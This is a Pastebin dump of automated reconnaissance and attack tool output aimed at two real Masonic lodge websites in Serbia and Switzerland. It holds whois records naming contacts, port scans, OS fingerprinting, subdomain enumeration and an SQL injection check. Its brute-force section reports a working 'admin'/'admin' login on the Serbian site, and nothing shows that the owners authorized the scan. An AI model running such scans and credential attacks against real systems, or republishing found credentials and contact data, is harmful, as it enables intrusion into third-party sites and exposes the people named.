Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ######################################################################################################################################
- Hostname www.mason.org.rs ISP Loopia AB (AS39570)
- Continent Europe Flag
- SE
- Country Sweden Country Code SE (SWE)
- Region Unknown Local time 07 Jan 2018 16:30 CET
- City Unknown Latitude 59.325
- IP Address 194.9.94.152 Longitude 18.056
- ######################################################################################################################################
- [i] Scanning Site: http://mason.org.rs
- B A S I C I N F O
- ====================
- [+] Site Title:
- [+] IP address: 194.9.94.152
- [+] Web Server: Could Not Detect
- [+] CMS: Joomla
- [+] Cloudflare: Not Detected
- [+] Robots File: Found
- -------------[ contents ]----------------
- # If the Joomla site is installed within a folder
- # eg www.example.com/joomla/ then the robots.txt file
- # MUST be moved to the site root
- # eg www.example.com/robots.txt
- # AND the joomla folder name MUST be prefixed to all of the
- # paths.
- # eg the Disallow rule for the /administrator/ folder MUST
- # be changed to read
- # Disallow: /joomla/administrator/
- #
- # For more information about the robots.txt standard, see:
- # http://www.robotstxt.org/orig.html
- #
- # For syntax checking, see:
- # http://tool.motoricerca.info/robots-checker.phtml
- User-agent: *
- Disallow: /administrator/
- Disallow: /bin/
- Disallow: /cache/
- Disallow: /cli/
- Disallow: /components/
- Disallow: /includes/
- Disallow: /installation/
- Disallow: /language/
- Disallow: /layouts/
- Disallow: /libraries/
- Disallow: /logs/
- Disallow: /modules/
- Disallow: /plugins/
- Disallow: /tmp/
- -----------[end of contents]-------------
- W H O I S L O O K U P
- ========================
- %
- %This is the RNIDS Whois server.
- %
- % Date Format : DD.MM.YYYY
- % Whois Server Version: 1.0.0
- %
- % Rights restricted by copyright.
- % See http://www.rnids.rs/whois_en
- %
- %
- %
- % Ovo je odgovor od RNIDS Whois servera.
- %
- % Format datuma : DD.MM.YYYY
- % Verzija Whois Servera : 1.0.0
- %
- % Sva prava zadržana. Za više informacija.
- % pogledajte http://www.rnids.rs/whois_sr
- Domain name: mason.org.rs
- Domain status: Active
- Registration date: 20.05.2009 09:25:05
- Modification date: 20.04.2017 15:43:53
- Expiration date: 20.05.2018 09:25:05
- Registrar: Loopia d.o.o.
- Registrant: Velika Nacionalna Loza Srbije
- Address: Sajmiste Bb, Beograd, Serbia
- ID Number: 17704974
- Tax ID: 105454946
- DNS: ns1.loopia.se - 93.188.0.20
- DNS: ns2.loopia.se - 93.188.0.21
- DNS: ns3.loopia.se - 194.9.94.245
- DNS: ns4.loopia.se - 194.9.95.245
- Administrative contact: Voja Milicevic, Velika Nacionalna Loza Srbije
- Address: Sajmiste Bb, Beograd, Serbia
- Technical contact: Dijana Todorović, Loopia d.o.o.
- Address: Obrenovićeva 46, TPC KALČA C1/72, Nis, Serbia
- G E O I P L O O K U P
- =========================
- [i] IP Address: 194.9.94.152
- [i] Country: SE
- [i] State: N/A
- [i] City: N/A
- [i] Latitude: 59.324699
- [i] Longitude: 18.056000
- H T T P H E A D E R S
- =======================
- [i] HTTP/1.1 200 OK
- [i] Server: nginx/1.12.1
- [i] Date: Sun, 07 Jan 2018 15:48:06 GMT
- [i] Content-Type: text/html; charset=utf-8
- [i] Connection: close
- [i] Vary: X-Forwarded-For
- [i] X-Powered-By: PHP/5.6.30
- [i] Set-Cookie: 649c1dfc682d5288fa34186a03dbd086=sf5r79gel8kf1lal33gf0cbai1; path=/; HttpOnly
- [i] Expires: Wed, 17 Aug 2005 00:00:00 GMT
- [i] Last-Modified: Sun, 07 Jan 2018 15:48:06 GMT
- [i] Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
- [i] Pragma: no-cache
- D N S L O O K U P
- ===================
- mason.org.rs. 299 IN A 194.9.94.152
- mason.org.rs. 299 IN RRSIG A 8 3 300 20180118000000 20171228000000 7374 mason.org.rs. fviYTfkyqFYQ+pNqFbVEAMAGs4MGMTyi+Wsx751pnPI9iW75BPsDHHKm i9De+/3VV2ONy6cvx+9ljS0L94QIuSRZEa6o1Mwin/HWmz9hDsmSTeY0 gOYjoq0cZuPmdlAH/QK5Ljrhfku9gqqqjQFu5f0HhFUkptvZiO1Fsire yxI=
- mason.org.rs. 3599 IN NS ns1.loopia.se.
- mason.org.rs. 3599 IN NS ns2.loopia.se.
- mason.org.rs. 3599 IN RRSIG NS 8 3 3600 20180118000000 20171228000000 7374 mason.org.rs. h4ccyyQyZj58q0Ljvk+exj++cDOJgXpaeURhi8hhOeYJVw0erHibnyIa y3YXUNW+nv8WvZn+eAW3jIthzVwdw9iwXNdlxbMGXn2zCUC2K8QmJqxv zFgTLXbrrD2kD2CZ8SpCSRouvLwdH/3wVbR1vsPwSsqv4Qn9tWVKSJEQ dzA=
- mason.org.rs. 3599 IN SOA ns1.loopia.se. registry.loopia.se. 1515024000 10800 3600 604800 86400
- mason.org.rs. 3599 IN RRSIG SOA 8 3 3600 20180118000000 20171228000000 7374 mason.org.rs. PDB0nhAbGHsjDscjiM4dZqyz+aj0EmaHE86zR2t3frLKBH0fA3DFLS9u bUSIN7Y4ZB1KZqE2GyaB791nkRzn2tYU2xwVRV2S3QWuS/ej4aVesAYK dvP9r6PPfv+RE28fBQoiNTcMWWVPe8+rGdiQi5B8SVlQHX+TFyycr0cE cX0=
- mason.org.rs. 299 IN MX 10 mail.mason.org.rs.
- mason.org.rs. 299 IN MX 20 mail2.mason.org.rs.
- mason.org.rs. 299 IN RRSIG MX 8 3 300 20180118000000 20171228000000 7374 mason.org.rs. n3Ehcd5hSCG5PKjMZyuKJIbSfgqckzJLzB+V2XxJS0RO3OmJtMUHsQ+d zxl3VvJjLB1JDid7wZuOW3FZxIUzBnovISPQqMa7bdQOy/e8eeXcnnm4 gREVq3H/MyNFtHjx8HEH/VsarUmEy1esL8IVTJyvvexm67O/BmI42hqf kdQ=
- mason.org.rs. 21599 IN DNSKEY 257 3 8 AwEAAclIpBWZzC2Q9emw7p5YJZs7PcdWC2apU59ndPue84ZlPk1k/y2O 1khqMlOsJXrCsWJuZ3BCQ77rCu0oEURDgKQi15mNIb0KI4d9BJVojL47 a+FuGw6ZIKjBm4EYr84BvOHvmju9tPkSV/lYM8oA5wndi/tjSXazETP/ 4lFI5jFT5KOF8EwRRtN9oh7Jtrv1OhS22UEkwk3Ozc8o2guYkJH3Ei9g 0zXyluUC7QA5W5XaItxDXuLfSvF5aW5mzxSPWucbxLddJXd5EdQaPOEp l1M+6dab+VRdW4ywxb8BDztEPDeV2vs6iLrz4PmGDtC3mHlfXcMdjgl2 O5dPHTKib6k=
- mason.org.rs. 21599 IN DNSKEY 256 3 8 AwEAAdEXkZWeKvb/C238SHG+I2YKpkjq1/GmGCSy+XY6PD+cQtHJo0Dn viEEb2DB8RJ81Rpw5PBb0w/ZtBkr8Y9UoDDFZQgKv0I4kHp8gCjcKUg2 jh170H4ifpFTQhUV7mAsdMWEhd9z9LPc4uOMvqSIQ7hD6p94T7xlhNho APyW03w1
- mason.org.rs. 21599 IN DNSKEY 256 3 8 AwEAAerypN+7gI8SoHE4KcTqDI9NAg7wC/qG/B0oe2Ws0imPx0LCpDvj PXaqN63nhpCLD032e9qH+BoiyGC8/3oT2ht0hfJFJzrwbgrmnbGCJL1i +/tWKCz8PGW0plcsZ98hCArQObvMF1XcwV7FVmOisIE4vkeuAgUPArOT RMASioIb
- mason.org.rs. 21599 IN RRSIG DNSKEY 8 3 86400 20180118000000 20171228000000 12412 mason.org.rs. mLX9+FGc8Z+kAREYIq9dv9gkZ/2GZE0awm5cti3KUsKiODL2uqjNiuBo L5EAOBslfwW8N/Uh9sSyBf2erekOPfKcIU/XpkP/KRGywE7W3DRjPY38 THIGSi8YdkKB/LL3L4yeajd7WPtxlKTQOOFqZ8lSHGmI4kQdyRN7t/Cj EoNbt0ifbjARmocEBQ5JhdKSTzW9Godl4aMD0pCGfce5uVJBt6iY1rin s85dx0NvRIBAVz0A2hY823xiZjIjyuHsyTKd0tKfhO+cukWkG7IVg8Ts 4bo/GTfZ7yfRgzKbXxE84YqQsJwogsn8k+jfwsU3VryeX4gQsVW4IOxl uQ5o7Q==
- mason.org.rs. 21599 IN NSEC3PARAM 1 0 1 AB
- mason.org.rs. 21599 IN RRSIG NSEC3PARAM 8 3 86400 20180118000000 20171228000000 7374 mason.org.rs. nn6/nCOqSS9PibVr8clJxzLjztgpRvnBkQ/vz5waTQ0DPwgGKV3IYMLi I1KndtzDpjPw9rmfOUnyflkaoQazI8OjjClrr2iiWPsH4nzrRoFL5OOB oJHr+Po+Af7fyZMlolWL0tygWB8BXTPNmwtFJe+JmRisaF7E0fgCTEXt c0c=
- S U B N E T C A L C U L A T I O N
- ====================================
- Address = 194.9.94.152
- Network = 194.9.94.152 / 32
- Netmask = 255.255.255.255
- Broadcast = not needed on Point-to-Point links
- Wildcard Mask = 0.0.0.0
- Hosts Bits = 0
- Max. Hosts = 1 (2^0 - 0)
- Host Range = { 194.9.94.152 - 194.9.94.152 }
- N M A P P O R T S C A N
- ============================
- Starting Nmap 7.01 ( https://nmap.org ) at 2018-01-07 15:48 UTC
- Nmap scan report for mason.org.rs (194.9.94.152)
- Host is up (0.11s latency).
- rDNS record for 194.9.94.152: s436.loopia.se
- PORT STATE SERVICE VERSION
- 21/tcp filtered ftp
- 22/tcp filtered ssh
- 23/tcp filtered telnet
- 25/tcp filtered smtp
- 80/tcp open http nginx 1.12.1
- 110/tcp filtered pop3
- 143/tcp filtered imap
- 443/tcp open ssl/http nginx 1.12.1
- 445/tcp filtered microsoft-ds
- 3389/tcp filtered ms-wbt-server
- Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
- Nmap done: 1 IP address (1 host up) scanned in 15.38 seconds
- Enter the target: http://www.mason.org.rs/
- [!] IP Address : 194.9.94.152
- [!] Server: nginx/1.12.1
- [!] Powered By: PHP/5.6.30
- [-] Clickjacking protection is not in place.
- [!] www.mason.org.rs doesn't seem to use a CMS
- [+] Honeypot Probabilty: 0%
- ----------------------------------------
- PORT STATE SERVICE VERSION
- 21/tcp filtered ftp
- 22/tcp filtered ssh
- 23/tcp filtered telnet
- 25/tcp filtered smtp
- 80/tcp open http nginx 1.12.1
- 110/tcp filtered pop3
- 143/tcp filtered imap
- 443/tcp open ssl/http nginx 1.12.1
- 445/tcp filtered microsoft-ds
- 3389/tcp filtered ms-wbt-server
- ----------------------------------------
- [+] DNS Records
- [+] Host Records (A)
- www.mason.org.rsHTTP: (s436.loopia.se) (194.9.94.152) AS39570 Loopia AB Sweden
- [+] TXT Records
- [+] DNS Map: https://dnsdumpster.com/static/map/mason.org.rs.png
- [>] Initiating 3 intel modules
- [>] Loading Alpha module (1/3)
- [>] Beta module deployed (2/3)
- [>] Gamma module initiated (3/3)
- [+] Emails found:
- ------------------
- pixel-151534009481492-web-@www.mason.org.rs
- pixel-1515340100556472-web-@www.mason.org.rs
- No hosts found
- [+] Virtual hosts:
- -----------------
- [>] Crawling the target for fuzzable URLs
- [+] Found 11 fuzzable URLs
- http://www.mason.org.rs///index.php?limit=10&start=10
- [>] Using SQLMap api to check for SQL injection vulnerabilities. Don't
- worry we are using an online service and it doesn't depend on your internet connection.
- This scan will take 2-3 minutes.
- 92m====================================================================================[0m
- [91m RUNNING NSLOOKUP [0m
- [92m====================================================================================[0m
- Server: 192.168.1.254
- Address: 192.168.1.254#53
- Non-authoritative answer:
- Name: mason.org.rs
- Address: 194.9.94.152
- mason.org.rs has address 194.9.94.152
- mason.org.rs mail is handled by 20 mail2.mason.org.rs.
- mason.org.rs mail is handled by 10 mail.mason.org.rs.
- [92m====================================================================================[0m
- [91m CHECKING OS FINGERPRINT [0m
- [92m====================================================================================[0m
- Xprobe2 v.0.3 Copyright (c) 2002-2005 fyodor@o0o.nu, ofir@sys-security.com, meder@o0o.nu
- [+] Target is mason.org.rs
- [+] Loading modules.
- [+] Following modules are loaded:
- [x] [1] ping:icmp_ping - ICMP echo discovery module
- [x] [2] ping:tcp_ping - TCP-based ping discovery module
- [x] [3] ping:udp_ping - UDP-based ping discovery module
- [x] [4] infogather:ttl_calc - TCP and UDP based TTL distance calculation
- [x] [5] infogather:portscan - TCP and UDP PortScanner
- [x] [6] fingerprint:icmp_echo - ICMP Echo request fingerprinting module
- [x] [7] fingerprint:icmp_tstamp - ICMP Timestamp request fingerprinting module
- [x] [8] fingerprint:icmp_amask - ICMP Address mask request fingerprinting module
- [x] [9] fingerprint:icmp_port_unreach - ICMP port unreachable fingerprinting module
- [x] [10] fingerprint:tcp_hshake - TCP Handshake fingerprinting module
- [x] [11] fingerprint:tcp_rst - TCP RST fingerprinting module
- [x] [12] fingerprint:smb - SMB fingerprinting module
- [x] [13] fingerprint:snmp - SNMPv2c fingerprinting module
- [+] 13 modules registered
- [+] Initializing scan engine
- [+] Running scan engine
- [-] ping:tcp_ping module: no closed/open TCP ports known on 194.9.94.152. Module test failed
- [-] ping:udp_ping module: no closed/open UDP ports known on 194.9.94.152. Module test failed
- [-] No distance calculation. 194.9.94.152 appears to be dead or no ports known
- [+] Host: 194.9.94.152 is up (Guess probability: 50%)
- [+] Target: 194.9.94.152 is alive. Round-Trip Time: 9.71941 sec
- [+] Selected safe Round-Trip Time value is: 19.43883 sec
- [-] fingerprint:tcp_hshake Module execution aborted (no open TCP ports known)
- [-] fingerprint:smb need either TCP port 139 or 445 to run
- [+] Primary guess:
- [+] Host 194.9.94.152 Running OS: "FreeBSD 4.8" (Guess probability: 91%)
- [+] Other guesses:
- [+] Host 194.9.94.152 Running OS: "FreeBSD 4.4" (Guess probability: 91%)
- [+] Host 194.9.94.152 Running OS: "FreeBSD 5.2" (Guess probability: 91%)
- [+] Host 194.9.94.152 Running OS: (Guess probability: 91%)
- [+] Host 194.9.94.152 Running OS: "FreeBSD 5.3" (Guess probability: 91%)
- [+] Host 194.9.94.152 Running OS: "FreeBSD 4.6" (Guess probability: 91%)
- [+] Host 194.9.94.152 Running OS: "FreeBSD 4.7" (Guess probability: 91%)
- [+] Host 194.9.94.152 Running OS: "FreeBSD 4.7" (Guess probability: 91%)
- [+] Host 194.9.94.152 Running OS: "FreeBSD 4.6" (Guess probability: 91%)
- [+] Host 194.9.94.152 Running OS: "FreeBSD 5.3" (Guess probability: 91%)
- [+] Cleaning up scan engine
- [+] Modules deinitialized
- [+] Execution completed.
- [92m====================================================================================[0m
- [91m GATHERING WHOIS INFO [0m
- [92m====================================================================================[0m
- %
- %This is the RNIDS Whois server.
- %
- % Date Format : DD.MM.YYYY
- % Whois Server Version: 1.0.0
- %
- % Rights restricted by copyright.
- % See http://www.rnids.rs/whois_en
- %
- %
- %
- % Ovo je odgovor od RNIDS Whois servera.
- %
- % Format datuma : DD.MM.YYYY
- % Verzija Whois Servera : 1.0.0
- %
- % Sva prava zadržana. Za više informacija.
- % pogledajte http://www.rnids.rs/whois_sr
- Domain name: mason.org.rs
- Domain status: Active
- Registration date: 20.05.2009 09:25:05
- Modification date: 20.04.2017 15:43:53
- Expiration date: 20.05.2018 09:25:05
- Registrar: Loopia d.o.o.
- Registrant: Velika Nacionalna Loza Srbije
- Address: Sajmiste Bb, Beograd, Serbia
- ID Number: 17704974
- Tax ID: 105454946
- DNS: ns1.loopia.se - 93.188.0.20
- DNS: ns2.loopia.se - 93.188.0.21
- DNS: ns3.loopia.se - 194.9.94.245
- DNS: ns4.loopia.se - 194.9.95.245
- Administrative contact: Voja Milicevic, Velika Nacionalna Loza Srbije
- Address: Sajmiste Bb, Beograd, Serbia
- Technical contact: Dijana Todorović, Loopia d.o.o.
- Address: Obrenovićeva 46, TPC KALČA C1/72, Nis, Serbia
- [92m====================================================================================[0m
- [91m GATHERING OSINT INFO [0m
- [92m====================================================================================[0m
- *******************************************************************
- * *
- * | |_| |__ ___ /\ /\__ _ _ ____ _____ ___| |_ ___ _ __ *
- * | __| '_ \ / _ \ / /_/ / _` | '__\ \ / / _ \/ __| __/ _ \ '__| *
- * | |_| | | | __/ / __ / (_| | | \ V / __/\__ \ || __/ | *
- * \__|_| |_|\___| \/ /_/ \__,_|_| \_/ \___||___/\__\___|_| *
- * *
- * TheHarvester Ver. 2.7 *
- * Coded by Christian Martorella *
- * Edge-Security Research *
- * cmartorella@edge-security.com *
- *******************************************************************
- Full harvest..
- [-] Searching in Google..
- Searching 0 results...
- [-] Searching in PGP Key server..
- [-] Searching in Bing..
- ******************************************************
- * /\/\ ___| |_ __ _ __ _ ___ ___ / _(_) | *
- * / \ / _ \ __/ _` |/ _` |/ _ \ / _ \| |_| | | *
- * / /\/\ \ __/ || (_| | (_| | (_) | (_) | _| | | *
- * \/ \/\___|\__\__,_|\__, |\___/ \___/|_| |_|_| *
- * |___/ *
- * Metagoofil Ver 2.2 *
- * Christian Martorella *
- * Edge-Security.com *
- * cmartorella_at_edge-security.com *
- ******************************************************
- [-] Starting online search...
- [-] Searching for doc files, with a limit of 25
- Searching 100 results...
- Results: 0 files found
- Starting to download 25 of them:
- ----------------------------------------
- [-] Searching for pdf files, with a limit of 25
- Searching 100 results...
- Results: 0 files found
- Starting to download 25 of them:
- ----------------------------------------
- [-] Searching for xls files, with a limit of 25
- Searching 100 results...
- Results: 0 files found
- Starting to download 25 of them:
- ----------------------------------------
- [-] Searching for csv files, with a limit of 25
- Searching 100 results...
- Results: 0 files found
- Starting to download 25 of them:
- ----------------------------------------
- [-] Searching for txt files, with a limit of 25
- Searching 100 results...
- Results: 0 files found
- Starting to download 25 of them:
- ----------------------------------------
- processing
- user
- email
- [+] List of users found:
- --------------------------
- [+] List of software found:
- -----------------------------
- [+] List of paths and servers found:
- ---------------------------------------
- [+] List of e-mails found:
- ----------------------------
- [92m====================================================================================[0m
- [91m GATHERING DNS INFO [0m
- [92m====================================================================================[0m
- ; <<>> DiG 9.11.2-5-Debian <<>> -x mason.org.rs
- ;; global options: +cmd
- ;; Got answer:
- ;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 3001
- ;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1
- ;; OPT PSEUDOSECTION:
- ; EDNS: version: 0, flags:; udp: 4096
- ;; QUESTION SECTION:
- ;rs.org.mason.in-addr.arpa. IN PTR
- ;; AUTHORITY SECTION:
- in-addr.arpa. 3600 IN SOA b.in-addr-servers.arpa. nstld.iana.org. 2017102539 1800 900 604800 3600
- ;; Query time: 203 msec
- ;; SERVER: 192.168.1.254#53(192.168.1.254)
- ;; WHEN: Sun Jan 07 10:43:16 EST 2018
- ;; MSG SIZE rcvd: 122
- dnsenum VERSION:1.2.4
- [1;34m
- ----- mason.org.rs -----
- [0m[1;31m
- Host's addresses:
- __________________
- [0mmason.org.rs. 94 IN A 194.9.94.152
- [1;31m
- Name Servers:
- ______________
- [0mns1.loopia.se. 3598 IN A 93.188.0.20
- ns2.loopia.se. 3600 IN A 93.188.0.21
- [1;31m
- Mail (MX) Servers:
- ___________________
- [0mmail.mason.org.rs. 93 IN A 194.9.94.72
- mail2.mason.org.rs. 93 IN A 194.9.94.3
- [1;31m
- Trying Zone Transfers and getting Bind Versions:
- _________________________________________________
- [0m
- Trying Zone Transfer for mason.org.rs on ns1.loopia.se ...
- Trying Zone Transfer for mason.org.rs on ns2.loopia.se ...
- brute force file not specified, bay.
- [92m====================================================================================[0m
- [91m GATHERING DNS SUBDOMAINS [0m
- [92m====================================================================================[0m
- [91m
- ____ _ _ _ _ _____
- / ___| _ _| |__ | (_)___| |_|___ / _ __
- \___ \| | | | '_ \| | / __| __| |_ \| '__|
- ___) | |_| | |_) | | \__ \ |_ ___) | |
- |____/ \__,_|_.__/|_|_|___/\__|____/|_|[0m[93m
- # Coded By Ahmed Aboul-Ela - @aboul3la
- [94m[-] Enumerating subdomains now for mason.org.rs[0m
- [93m[-] verbosity is enabled, will show the subdomains results in realtime[0m
- [92m[-] Searching now in Baidu..[0m
- [92m[-] Searching now in Yahoo..[0m
- [92m[-] Searching now in Google..[0m
- [92m[-] Searching now in Bing..[0m
- [92m[-] Searching now in Ask..[0m
- [92m[-] Searching now in Netcraft..[0m
- [92m[-] Searching now in DNSdumpster..[0m
- [92m[-] Searching now in Virustotal..[0m
- [92m[-] Searching now in ThreatCrowd..[0m
- [92m[-] Searching now in SSL Certificates..[0m
- [92m[-] Searching now in PassiveDNS..[0m
- [91mYahoo: [0mwww.mason.org.rs
- ("bad handshake: SysCallError(-1, 'Unexpected EOF')",)
- ("bad handshake: SysCallError(-1, 'Unexpected EOF')",)
- [93m[-] Saving results to file: [0m[91m/usr/share/sniper/loot/domains/domains-mason.org.rs.txt[0m
- [93m[-] Total Unique Subdomains Found: 1[0m
- [92mwww.mason.org.rs[0m
- [91m ╔═╗╦═╗╔╦╗╔═╗╦ ╦[0m
- [91m ║ ╠╦╝ ║ ╚═╗╠═╣[0m
- [91m ╚═╝╩╚═ ╩o╚═╝╩ ╩[0m
- [92m====================================================================================[0m
- [91m GATHERING CERTIFICATE SUBDOMAINS [0m
- [92m====================================================================================[0m
- [94m
- [91m[+] Domains saved to: /usr/share/sniper/loot/domains/domains-mason.org.rs-full.txt
- [0m
- [92m====================================================================================[0m
- [91m CHECKING FOR SUBDOMAIN HIJACKING [0m
- [92m====================================================================================[0m
- [92m====================================================================================[0m
- [91m CHECKING EMAIL SECURITY [0m
- [92m====================================================================================[0m
- [92m====================================================================================[0m
- [91m STARTING DOMAIN FLYOVER [0m
- [92m====================================================================================[0m
- [92m====================================================================================[0m
- [91m STARTING PUBLIC S3 BUCKET SCAN [0m
- [92m====================================================================================[0m
- [92m====================================================================================[0m
- [91m PINGING HOST [0m
- [92m====================================================================================[0m
- PING mason.org.rs (194.9.94.152) 56(84) bytes of data.
- 64 bytes from s436.loopia.se (194.9.94.152): icmp_seq=1 ttl=49 time=2821 ms
- --- mason.org.rs ping statistics ---
- 1 packets transmitted, 1 received, 0% packet loss, time 0ms
- rtt min/avg/max/mdev = 2821.181/2821.181/2821.181/0.000 ms
- [92m====================================================================================[0m
- [91m RUNNING TCP PORT SCAN [0m
- [92m====================================================================================[0m
- Starting Nmap 7.60 ( https://nmap.org ) at 2018-01-07 10:48 EST
- Nmap done: 1 IP address (1 host up) scanned in 25.59 seconds
- [92m====================================================================================[0m
- [91m RUNNING INTRUSIVE SCANS [0m
- [92m====================================================================================[0m
- [92m====================================================================================[0m
- [91m SCANNING FOR COMMON VULNERABILITIES [0m
- [92m====================================================================================[0m
- [92m====================================================================================[0m
- [91m SKIPPING FULL NMAP PORT SCAN [0m
- [92m====================================================================================[0m
- [92m====================================================================================[0m
- [91m RUNNING BRUTE FORCE [0m
- [92m====================================================================================[0m
- [91m __________ __ ____ ___[0m
- [91m \______ \_______ __ ___/ |_ ____ \ \/ /[0m
- [91m | | _/\_ __ \ | \ __\/ __ \ \ / [0m
- [91m | | \ | | \/ | /| | \ ___/ / \ [0m
- [91m |______ / |__| |____/ |__| \___ >___/\ \ [0m
- [91m \/ \/ \_/[0m
- [91m + -- --=[BruteX v1.7 by 1N3[0m
- [91m + -- --=[http://crowdshield.com[0m
- [92m################################### Running Port Scan ##############################[0m
- Starting Nmap 7.60 ( https://nmap.org ) at 2018-01-07 10:48 EST
- Nmap scan report for mason.org.rs (194.9.94.152)
- Host is up (0.14s latency).
- rDNS record for 194.9.94.152: s436.loopia.se
- Not shown: 24 filtered ports
- Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
- PORT STATE SERVICE
- 80/tcp open http
- 443/tcp open https
- Nmap done: 1 IP address (1 host up) scanned in 3.79 seconds
- [92m################################### Running Brute Force ############################[0m
- [91m + -- --=[Port 21 closed... skipping.[0m
- [91m + -- --=[Port 22 closed... skipping.[0m
- [91m + -- --=[Port 23 closed... skipping.[0m
- [91m + -- --=[Port 25 closed... skipping.[0m
- [92m + -- --=[Port 80 opened... running tests...[0m
- Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
- Hydra (http://www.thc.org/thc-hydra) starting at 2018-01-07 10:48:39
- [DATA] max 1 task per 1 server, overall 1 task, 1496 login tries (l:34/p:44), ~1496 tries per task
- [DATA] attacking http-get://mason.org.rs:80//
- [80][http-get] host: mason.org.rs login: admin password: admin
- [STATUS] attack finished for mason.org.rs (valid pair found)
- 1 of 1 target successfully completed, 1 valid password found
- Hydra (http://www.thc.org/thc-hydra) finished at 2018-01-07 10:48:43
- [91m + -- --=[Port 110 closed... skipping.[0m
- [91m + -- --=[Port 139 closed... skipping.[0m
- [91m + -- --=[Port 162 closed... skipping.[0m
- [91m + -- --=[Port 389 closed... skipping.[0m
- [92m + -- --=[Port 443 opened... running tests...[0m
- Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
- Hydra (http://www.thc.org/thc-hydra) starting at 2018-01-07 10:48:44
- [DATA] max 1 task per 1 server, overall 1 task, 1496 login tries (l:34/p:44), ~1496 tries per task
- [DATA] attacking http-gets://mason.org.rs:443//
- [443][http-get] host: mason.org.rs login: admin password: admin
- [STATUS] attack finished for mason.org.rs (valid pair found)
- 1 of 1 target successfully completed, 1 valid password found
- Hydra (http://www.thc.org/thc-hydra) finished at 2018-01-07 10:48:50
- [92m################################### Done! ###########################################[0m
- [92m====================================================================================[0m
- [91m SCAN COMPLETE! [0m
- [92m====================================================================================[0m
- ######################################################################################################################################
- Hostname www.francmaconnerie.ch ISP Infomaniak Network SA (AS29222)
- Continent Europe Flag
- CH
- Country Switzerland Country Code CH (CHE)
- Region Unknown Local time 07 Jan 2018 17:10 CET
- City Unknown Latitude 47.145
- IP Address 93.88.240.208 Longitude 8.155
- ######################################################################################################################################
- [i] Scanning Site: http://francmaconnerie.ch
- B A S I C I N F O
- ====================
- [+] Site Title:
- [+] IP address: 93.88.240.208
- [+] Web Server: Apache
- [+] CMS: Drupal
- [+] Cloudflare: Not Detected
- [+] Robots File: Found
- -------------[ contents ]----------------
- #
- # robots.txt
- #
- # This file is to prevent the crawling and indexing of certain parts
- # of your site by web crawlers and spiders run by sites like Yahoo!
- # and Google. By telling these "robots" where not to go on your site,
- # you save bandwidth and server resources.
- #
- # This file will be ignored unless it is at the root of your host:
- # Used: http://example.com/robots.txt
- # Ignored: http://example.com/site/robots.txt
- #
- # For more information about the robots.txt standard, see:
- # http://www.robotstxt.org/robotstxt.html
- User-agent: *
- Crawl-delay: 10
- # Directories
- Disallow: /includes/
- Disallow: /misc/
- Disallow: /modules/
- Disallow: /profiles/
- Disallow: /scripts/
- Disallow: /themes/
- # Files
- Disallow: /CHANGELOG.txt
- Disallow: /cron.php
- Disallow: /INSTALL.mysql.txt
- Disallow: /INSTALL.pgsql.txt
- Disallow: /INSTALL.sqlite.txt
- Disallow: /install.php
- Disallow: /INSTALL.txt
- Disallow: /LICENSE.txt
- Disallow: /MAINTAINERS.txt
- Disallow: /update.php
- Disallow: /UPGRADE.txt
- Disallow: /xmlrpc.php
- # Paths (clean URLs)
- Disallow: /admin/
- Disallow: /comment/reply/
- Disallow: /filter/tips/
- Disallow: /node/add/
- Disallow: /search/
- Disallow: /user/register/
- Disallow: /user/password/
- Disallow: /user/login/
- Disallow: /user/logout/
- # Paths (no clean URLs)
- Disallow: /?q=admin/
- Disallow: /?q=comment/reply/
- Disallow: /?q=filter/tips/
- Disallow: /?q=node/add/
- Disallow: /?q=search/
- Disallow: /?q=user/password/
- Disallow: /?q=user/register/
- Disallow: /?q=user/login/
- Disallow: /?q=user/logout/
- -----------[end of contents]-------------
- W H O I S L O O K U P
- ========================
- The number of requests per client per time interval is
- restricted. You have exceeded this limit.
- Please wait a moment and try again.
- G E O I P L O O K U P
- =========================
- [i] IP Address: 93.88.240.208
- [i] Country: CH
- [i] State: N/A
- [i] City: N/A
- [i] Latitude: 47.144901
- [i] Longitude: 8.155100
- H T T P H E A D E R S
- ======================
- [i] HTTP/1.1 403 Forbidden
- [i] Date: Sun, 07 Jan 2018 16:22:15 GMT
- [i] Server: Apache
- [i] Vary: accept-language,accept-charset
- [i] Accept-Ranges: bytes
- [i] Connection: close
- [i] Content-Type: text/html; charset=iso-8859-1
- [i] Content-Language: en
- [i] Expires: Sun, 07 Jan 2018 16:22:15 GMT
- D N S L O O K U P
- ===================
- francmaconnerie.ch. 21599 IN SOA ns5.infomaniak.ch. hostmaster.infomaniak.ch. 2013081201 10800 3600 604800 86400
- francmaconnerie.ch. 21599 IN TXT "v=spf1 include:spf.infomaniak.ch ?all"
- francmaconnerie.ch. 21599 IN MX 5 mta-gw.infomaniak.ch.
- francmaconnerie.ch. 21599 IN A 93.88.240.208
- francmaconnerie.ch. 21599 IN NS ns6.infomaniak.ch.
- francmaconnerie.ch. 21599 IN NS ns5.infomaniak.ch.
- S U B N E T C A L C U L A T I O N
- ====================================
- Address = 93.88.240.208
- Network = 93.88.240.208 / 32
- Netmask = 255.255.255.255
- Broadcast = not needed on Point-to-Point links
- Wildcard Mask = 0.0.0.0
- Hosts Bits = 0
- Max. Hosts = 1 (2^0 - 0)
- Host Range = { 93.88.240.208 - 93.88.240.208 }
- N M A P P O R T S C A N
- ============================
- Starting Nmap 7.01 ( https://nmap.org ) at 2018-01-07 16:23 UTC
- Nmap scan report for francmaconnerie.ch (93.88.240.208)
- Host is up (0.099s latency).
- rDNS record for 93.88.240.208: imu215.infomaniak.ch
- PORT STATE SERVICE VERSION
- 21/tcp open ftp ProFTPD 1.3.4e
- 22/tcp filtered ssh
- 23/tcp filtered telnet
- 25/tcp filtered smtp
- 80/tcp open http Apache httpd
- 110/tcp filtered pop3
- 143/tcp filtered imap
- 443/tcp open ssl/ssl Apache httpd (SSL-only mode)
- 445/tcp filtered microsoft-ds
- 3389/tcp filtered ms-wbt-server
- Service Info: OS: Unix
- Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
- Nmap done: 1 IP address (1 host up) scanned in 15.22 seconds
